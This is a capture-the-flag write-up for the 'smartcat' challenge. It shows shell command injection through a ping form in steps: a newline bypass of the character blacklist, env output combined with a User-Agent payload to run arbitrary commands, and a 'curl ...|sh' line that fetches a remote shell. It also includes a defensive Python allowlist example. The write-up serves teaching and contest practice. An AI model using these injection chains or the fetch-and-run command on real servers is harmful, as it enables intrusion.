

smartcat - Writeup by Maxima


Damn it, that stupid smart cat litter is broken again

Now only the debug interface is available here and this stupid thing only permits one ping to be sent!

I know my contract number is stored somewhere on that interface but I can't find it and this is the only available page! Please have a look and get this info for me!

FYI: no need to bruteforce anything there. If you do, you'll be banned permanently.



The web interface allows you to ping a domain name. This is the most basic example of shell command injection: we can guess that the server runs something like ping -c 1 $dest, so injecting a command separator should let us execute a second shell command. I first tried:

google.com; ls
google.com | ls

But I got a "Bad character" error, so some characters are clearly forbidden (the separators above and, as it turned out, spaces). I finally found out that \n (URL-encoded as %0A) is allowed, so I could execute a space-free command using:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Als'

That is nice! I also had the idea of using <, which is not blacklisted, to display the contents of a file: redirecting the file into cat's stdin needs no space at all.

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Acat<index.cgi'

The next step is to get a shell. My idea was to use sh</tmp/myfile, but I first needed a way to write to a file. I finally found the command env, which prints all environment variables:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi' -d 'dest=google.com%0Aenv'

Because the server uses CGI, the request headers are exposed to the script as environment variables (for instance HTTP_USER_AGENT). We can therefore use the User-Agent header to inject a shell command:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv'

It returns:

HTTP_USER_AGENT=xxx echo Powned; exit 0

That line is a perfectly well-formed shell script! So we can write the output of env to a file and feed that file to sh, which basically lets us execute any command:

curl 'http://smartcat.insomnihack.ch/cgi-bin/index.cgi?xxx' -A 'xxx echo Powned; exit 0' -d 'dest=google.com%0Aenv>/tmp/pony7%0Ash</tmp/pony7'
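The root cause of the whole chain above is a blacklist applied to a value that is then handed to a shell. The following Python handler is an added example, not code from the original challenge or writeup: it reproduces the flawed check as the writeup describes it (separators and spaces rejected, newline and < not) next to an allowlist version that never involves a shell. The exact blacklist, function names and the ping argument list are assumptions; the second version also shows the re `$` trailing-newline gotcha, which would re-open exactly the %0A bypass used above.

```python
import ipaddress
import re
import subprocess

# Constructed blacklist mirroring the behaviour the writeup observed:
# ';', '|' and ' ' are rejected, but '\n' and '<' slip through.
BLACKLIST = set(";|&` $()")


def vulnerable_filter(dest: str) -> bool:
    """Blacklist check as a naive CGI script might do it.

    Returns True if dest would be accepted. Newline and '<' are not
    covered, so "google.com\\nls" passes and becomes a second shell line.
    """
    return not any(ch in BLACKLIST for ch in dest)


def vulnerable_command(dest: str) -> str:
    """The string such a script would pass to `sh -c` (shown, never executed here)."""
    if not vulnerable_filter(dest):
        raise ValueError("Bad character")
    return f"ping -c 1 {dest}"


# Hardened version: allowlist the destination, then exec ping without a shell.
# One RFC 1123 hostname label: 1-63 chars, letters/digits/hyphen, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_dest(dest: str) -> str:
    """Accept a literal IPv4/IPv6 address or a well-formed hostname; reject anything else."""
    if not dest or len(dest) > 253:
        raise ValueError("Bad destination")
    try:
        return str(ipaddress.ip_address(dest))   # "8.8.8.8", "::1"
    except ValueError:
        pass
    labels = dest.rstrip(".").split(".")
    # fullmatch, not match(): with `^...$`, `$` also matches just before a
    # trailing "\n", so "com\n" would be accepted and the %0A trick returns.
    if not all(_LABEL.fullmatch(label) for label in labels):
        raise ValueError("Bad destination")
    return dest


def is_valid_dest(dest: str) -> bool:
    """Boolean wrapper around validate_dest for callers that prefer no exceptions."""
    try:
        validate_dest(dest)
        return True
    except ValueError:
        return False


def safe_ping_argv(dest: str) -> list:
    """argv for ping as a list: no shell parses it, so separators are just characters."""
    return ["ping", "-c", "1", validate_dest(dest)]


def run_ping(dest: str) -> str:
    """Run ping with shell=False (the default for a list argv) and a timeout.

    Note that CGI environment variables such as HTTP_USER_AGENT are
    attacker-controlled; never feed `env` output or any of them to a shell.
    """
    result = subprocess.run(safe_ping_argv(dest), capture_output=True,
                            text=True, timeout=10)
    return result.stdout


if __name__ == "__main__":
    for candidate in ["google.com", "8.8.8.8", "google.com\nls", "google.com<index.cgi"]:
        print(repr(candidate), "blacklist:", vulnerable_filter(candidate),
              "allowlist:", is_valid_dest(candidate))
```

The blacklist accepts both injected payloads from the writeup; the allowlist rejects them and, because the argv is a list, even an accepted value is only ever one argument to ping.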

Now it's easy to get the first flag:

find .
cat there/is/your/flag/or/maybe/not/what/do/you/think/really/please/tell/me/seriously/though/here/is/the/flag

For the second one, I used curl arthaud.me/sh|sh, which gives me a real shell on my server. Then:

$ /home/smartcat/readflag
Almost there... just trying to make sure you can execute arbitrary commands....
Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!'.
Do not include the quotes. Each part is a different line.
$ (echo "Give me a..."; sleep 2; echo "... flag!"; cat) | /home/smartcat/readflag
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\\!!!// .'_.'
        |`._`n'_.'|  hjw

INS{shells_are _way_better_than_cats}


Maxime Arthaud 2016/01/17 21:56

ctf/public/insomnihack-teaser/smartcat.txt · Last modified: 2016/10/15 20:11 by arthaum